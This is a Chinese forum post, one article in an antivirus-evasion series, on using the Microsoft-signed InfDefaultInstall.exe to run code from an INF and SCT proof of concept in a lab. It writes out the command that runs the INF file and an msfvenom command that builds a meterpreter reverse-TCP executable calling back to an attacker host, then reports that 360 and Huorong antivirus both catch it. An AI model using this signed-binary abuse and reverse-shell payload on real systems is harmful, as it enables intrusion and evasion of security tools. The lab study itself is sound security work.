本帖最后由 wholesome 于 2020-3-31 20:21 编辑
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
一、InfDefaultInstall.exe简介
InfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:
- C:\Windows\System32\Infdefaultinstall.exe
复制代码
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZQQnpWZmt3c1gyRjhOc2N1bzdYcG9YMUpQMzFEcDZ4UEY5Nmdnd3E4ZmxEbDVVcjBkaWNSS1NnLzY0MA?x-oss-process=image/format,png)
我们可以通过直接该文件后面跟inf文件来进行绕过一些限制
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZFOUpWV3RyVURPUzVWWU1vaWEyT3lWa2dTVUZ5OHZLdnB1aWJ3UW5CVjZleWI2UDMwVmNrOEt5dy82NDA?x-oss-process=image/format,png)
二、利用InfDefaultInstall.exe执行程序
- Poc地址如下:https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
复制代码
在本机进行示例,以下为shady2.inf的代码
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Zna0dZM0x5aWFZVHpQNmtzUEw3dkpsUk1GRFFQWXliYmVQcEFieFhxRjE2SXlvTW9QVTR2bzNRLzY0MA?x-oss-process=image/format,png)
以下为shady.sct的代码,可以看到最后是调出notepad.exe的
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZDelRxa2NaNjRoM2FxTHhZNEk5eXBpYUdLNXZNTHJJRjV3dEk1SzhUMWt3cXJLYnVMSHl3bWp3LzY0MA?x-oss-process=image/format,png)
在cmd窗口中运行
- InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
复制代码![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZJdDN0UjRiMU5aaFhnU2VmZTk0eTlla2VLU2F4RUZoYVp2cTdzd0kyR2lhTkpqU0xiZG5CdndnLzY0MA?x-oss-process=image/format,png)
三、利用InfDefaultInstall.exe执行payload
靶机:windows 10 ip地址:172.16.111.194
攻击机:kali linux ip地址:172.16.111.222
首先使用msf生成exe格式的shellcode
- msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
复制代码![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3YyQzZXcDNMV2FlVFpmeGxKZlVlYWFJdEdTaWM2aWNkVW1nN3dwSEtWZHR6aWJmZ2pmblJLN1ZVSHcvNjQw?x-oss-process=image/format,png)
将生成的exe木马复制到靶机,备份一份shady222.inf并更改shady.sct中的文件路径为hacker.exe
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZlcXRRd3diOU1mTzUyNXVpYkkzUkVISm1QN250NGF5UjhHMnU2SERWcnMzeTF3MDBlbWFQbjNBLzY0MA?x-oss-process=image/format,png)
在msf中设置监听
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3YxVFVpY21kZmFCY2lhTVhGd2ljdFVnWlNnNE5UaWJyT1pnaWJqZjRseVFkdlNQaWNpYjBjWXk4aWF4YmlhSHcvNjQw?x-oss-process=image/format,png)
靶机中使用InfDefaultInstall.exe运行shady222.inf
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZuZXlvZTBITXM1eFRrdzh3Y1l6QU9yYjl5MlJ0QzVkNVl4bUhlcld0clByckNpYk1EWWp3TjNBLzY0MA?x-oss-process=image/format,png)
攻击机kali成功监听到靶机上线
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Y2bG5maWNjOUhPZklqSU1sS3FYbVZ0NDFCbDhROWpvUHJuZXZZaWFnNVdTdm0zZXdNUlBwbzRzdy82NDA?x-oss-process=image/format,png)
以下为靶机安装360全家桶和火绒杀毒后的InfDefaultInstall.exe执行效果:360全家桶报毒,kali无法监听。
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3Z2Vzg0VEdqMzN6amliTURNTjNyQmxZZGdHRDVvbmxUNTZHS3lLa2tac3ltcFQ2RmdqVkhrWmxnLzY0MA?x-oss-process=image/format,png)
火绒报毒,kali无法监听。
![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9tbWJpei5xcGljLmNuL21tYml6X3BuZy9yVGljWjlIaWJiNlJXcHRhTnQ0bnRlMExxaWJ6dFBDZmlhS3ZmRzM2QU9Cd0ZqV0pzNkNKOVF6b0dpYkZMUHY4ZGN5dWVZZFFvc2ROUUZhTDljSkdZcmZWYXZnLzY0MA?x-oss-process=image/format,png)
四、参考资料
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
|